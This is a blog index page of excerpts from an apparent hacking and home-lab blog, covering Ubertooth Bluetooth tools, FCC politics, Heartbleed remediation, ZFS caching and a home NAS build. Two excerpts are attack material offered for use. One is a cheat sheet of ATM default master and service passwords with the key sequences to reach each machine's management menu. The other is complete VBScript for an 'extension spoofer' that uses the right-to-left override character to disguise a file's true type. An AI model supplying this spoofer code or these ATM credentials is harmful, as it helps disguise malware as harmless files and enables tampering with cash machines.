A little bitta Bluetooth

A little bitta Bluetooth

From [penturalabs.wordpress.com] Wow, yeah. I’ve had an ubertooth laying around (also doing BLE device detection) since Shmoocon 2012. Great chunk of updates, I’ll have to get some of these tools updated and play with some things, like my Pebble watch.   Recent update for Uburtooth! “The update, which has improved Operating System support, improved Bluetooth Low Energy (BTLE) support, and GitHub integration to make community development easier…. Highlights Bluetooth Smart (Low Energy) Support Promiscuous and follow modes Pcap format packet logging Pairing / encryption support when paired with crackle Credit for BLE features goes to Mike Ryan Unified host tool for monitoring Basic Rate ubertooth-rx replaces -lap, -uap, -hop tools Once UAP is discovered, ubertooth-rx automatically tries to find clock values and begin hopping Thanks to Will Code for working on this Survey tool – ubertooth-scan Combining both Ubertooth and a standard Bluetooth dongle Ubertooth scans for non-discoverable master devices Dongle probes devices for piconet information and features Cmake now used for the build system Improves support for non-Linux operating systems More sensible handling of dependencies Packaging (Experimental) Early stage support for packaging systems libbtbb in Homebrew repository, Ubertooth coming soon MacPorts availability is under test Release already available in Pentoo GitHub migration libbtbb, Ubertooth and gr-bluetooth all hosted on GitHub Allows for more open development and collaboration model Already seeing an increase in issue reporting and pull requests Installation Gentoo/Pentoo Libbtbb git clone https://github.com/greatscottgadgets/libbtbb.git cd libbtbb mkdir build cd build cmake .. sudo make install Ubertooth tools git clone https://github.com/greatscottgadgets/ubertooth.git cd ubertooth/host mkdir build cd build cmake .. sudo make install or if you want ubertooth-follow and ubertooth-scan –...
Greed, Corruption, and Dirty Politics Are About to Ruin the Internet

Greed, Corruption, and Dirty Politics Are About to Ruin the Internet

Some quick reading… Former Adelstein aid leaves FCC for Comcast [reclaimthemedia.org] Tom Wheeler, Former Lobbyist and Obama Fundraiser, Tapped to Lead FCC [time.com] Former FCC Boss Michael Powell Now Top Cable Lobbyist [dslreports.com] Meredith Attwell Baker, FCC Commissioner, Joins NBCUniversal 4 Months After Approving Comcast Merger [huffingtonpost.com] It is the FCC’s job to determine if the Comcast/Time Warner merger is a threat to competition. Looks like they’re buying a favorable decision. [theverge.com] It looks like these two companies have been planning this merger for at least a decade. There is nearly zero market overlap:                         source: sbnation.com   According to the ACSI Telecommunications and Information Report 2014, “Internet Service Providers at Rock Bottom Without Much Incentive to Improve” High prices, slow data transmission and unreliable service drag satisfaction to record lows, as customers have few alternatives beyond the largest Internet service providers. Customer satisfaction with ISPs drops 3.1% to 63, the lowest score in the Index.     Now, you might think this is no big deal. We’re not too bad off, “my internet works”. Well, you might be interested to know that the US isn’t just not even in the top 10 countries for the fastest average Internet speeds… We’re not even in the top 25! USA has the #32 fastest Internet in the world (http://www.netindex.com/download/allcountries/).  Here’s a fun game. Just try and name 31 other modernized countries. I couldn’t make it past 20.   Now the regulating body over this industry is filled with former lobbyists for the industry it regulates, is interested in helping to reduce the amount...
HeartBleed Notes

HeartBleed Notes

On April 7, 2014, OpenSSL patched a major vulnerability. OpenSSL is an implementation of SSL, a common method for securing online communications.   What are some common types of systems they could be affected? Webservers Instant Messaging Applications and Servers SSL VPN Servers Email Servers Management Interfaces for network and network security appliances     Who is affected? Any server using OpenSSL version 1.0.1 to 1.0.1f and 1.0.2 (1.0.2 remains in beta and will receive a patch shortly).   What can a hacker use this vulnerability to accomplish? The Heartbleed vulnerability allows a hacker to obtain small portions (64 kilobits) of memory per connection to any server using OpenSSL v1.0.1-1.0.1f. This is per connection and there is no limit to the number of connections made. By reading these portions of memory a hacker may obtain access to usernames, passwords, SSL certificates, private keys, or other data could be disclosed, providing a hacker with access to individual accounts, or the server, or giving them the ability to perform a man in the middle attack in the future until keys and certificates are changed.   What should be done? While the immediate response may vary depending on uptime requirements and the associated risk of a compromised server, our suggested remediation steps are provided below. As additional information becomes available, we may provide updates to these initial recommendations: Identify systems which currently utilize OpenSSL for any of the common affected server types noted above. Ensure that the OpenSSL update (1.0.1g) has been installed and that it is active Re-create SSL private keys on the affected systems as they could be disclosed while...
More ATM Default Passwords

More ATM Default Passwords

It’s been almost two years since I harped on this stuff. Found out I’m getting visits to the old post still, so I figured it’s time for a quick update. Did a little looking around on Google and the results turned up the following: Here’s some manuals I found at http://attrition.org/misc/ee/atm_manuals/: 07103-00013C (FT5KUsrMan(3.0))file Tranax Mb Operator Manual MakoOps(4.1) 07102-00047 (RT2KUsrMan) 98XXman(2.5) 07100-00008F (9100UsrMan(5.0)) 07100-00018B (RL5KUsrMan(2.0)) 07100-00055 (8100 manual) 07102-00042B (97XXOpsMan(2.0)) And a fun cheat sheet for other default passwords that have been made available on the Internet.  Company  Model  ACCESSING THE MANAGEMENT FUNCTIONS MENU  Master Password  ID Code  Admin Password  Diebold  CSP 200 1. With the terminal in the in-service mode, press the terminal maintenance switch. The Out of Service Password screen displays.2. Enter the password (the default password is 626243). An asterisk appears on the screen for each character entered. 3. Once the password is entered, Select ENTER or press the Enter key on the numeric keypad. The Manage Passwords screen displays.  626243  Hyosung  NH5050 1. Press the ENTER, CLEAR, and CANCEL keys at the same time; then enter 1, 2, 3 in order.2. Enter your password and press ENTER.  Hyosung  MB1500 Press theCANCEL, CLEAR, ENTER key simultaneously and then press 1, 2, 3 keys in order. Operator Password is “159951”..Master Password is “375876”.. Service Password is “965733”.  Hyosung  MB1800 Press theCANCEL, CLEAR, ENTER key simultaneously and then press 1, 2, 3 keys in order. Operator Password is “111111”..Master Password is “555555”.. Service Password is “222222”. Thefactory default RMS Password is “111111”.  Hyosung  MB2100T 1) Change to supervisor mode by pressinghighlighted switch. (upper right corner) Operator Password is “222222”.Master Password is “555555”. Service Password is “111111”. Thefactory...

Adding SSD ZIL and L2ARC on FreeBSD

I have two 64GB Intel SSDs I’ll be mirroring for ZIL and one 180GB Intel SSD to use for cache. My current pools are: VMs Storage Backups   For VMs, I have a HUGE amount of random I/O as my array currently hosts a few virtual servers full time as well as many machines I regularly power up for testing, training, and challenges. My storage pool doesn’t see a ton of random I/O, but since it’s my most frequently used pool, and I have the space to add ZIL to it, I’ll be doing so. Finally, Backups get quite a bit of small writes with all my machines regularly backing up to it, so I expect it will greatly benefit from ZIL. According to the ZFS best practices guide (http://www.solarisinternals.com/wiki/index.php/ZFS_Best_Practices_Guide) The ZFS intent log (ZIL) is provided to satisfy POSIX requirements for synchronous writes. By default, the ZIL is allocated from blocks within the main storage pool (this means your actual writes compete with the ZIL writes. That’s going to basically split your performance in half, and is especially bad on mechanical drives since they need to seek between multiple sectors to do this). Better performance might be possible by using dedicated nonvolatile log devices such as NVRAM, SSD drives, or even a dedicated spindle disk. If your server hosts a database, virtual machines, iSCSI targets, acts as a NFS server with the clients mounting in “sync” mode, or in any way has heavy synchronous write requests, then you may benefit by using a dedicated log device for ZIL. The benefit of a dedicated ZIL depends on your usage....

Build a Home NAS

Thinking about building or buying a home NAS or file server? While I can’t cover every use case, this article will feature my suggested small build and I’ll come back later for an update that discusses the large build I use (15 hot swap bays, 3 SSD drives, ESXi, ZFS, two LSI HBA adaptors, PCIe passthrough, 32GB RAM beast that currently occupies my closet and hosts all my files and my home lab). There’s a lot to be gained from building your own file server for home. While some of the commercial options offer extreeme simplicity (Drobo), great features and appearance (Synology, Qnap), or very low price (plenty of options here, all seem to come with a severe lack of performance), you could build your own server with many of the same features, hand picked hardware, and you just might end up learning something in the process!   Before we get started, if you get in over your head, go back to the first paragraph and review – there’s some good guidance there. Drobo is dead stupid simple (but be prepared to pay the price), while Synology and Qnap both offer some great hardware and software (and they can act as your Plex Media Server too!) Alright, so let’s begin.   First, I’m assuming you fall into a certain range of needs with this recommendation: This article is for people that need between 2-9TB of available space that will tolerate one hard drive failing at a time (this happens to about 1/10 hard drives in the first 3 years of use. Seriously). If you end up building a NAS that has...

Extension Spoofer

Here’s one extension spoofer you can trust (vbscript code provided) '========================================================' ' ' ' EXTENSION SPOOFER ' ' CODED BY DJ MAK ' ' http://hackwithmak.tk ' '========================================================' Call Spoof Sub Spoof() dim filePath,fileName,exten,FileLen,revExten,dest,NewFileName set fs = CreateObject("Scripting.FileSystemObject") filePath=inputbox("Enter The FilePath") exten=inputbox("Enter the Extension to spoof" & vbCrlf & _ "Example : .jpg, .mp3 , .avi , etc..") fileName=fs.GetFileName(filepath) filePath=fs.GetParentFolderName(filepath) FileLen=Len(fileName)-4 Dim spclChar spclChar = ChrW(8238) revExten=StrReverse(exten) NewFileName=inputbox("Enter the new file name max 5 chars") dest=NewFileName & spclChar & revExten & mid(fileName,FileLen+2) fs.copyFile filePath & "\" & Filename,filePath & "\" & dest msgbox "Extension Spoofed Successfully!!",vbInformation end sub...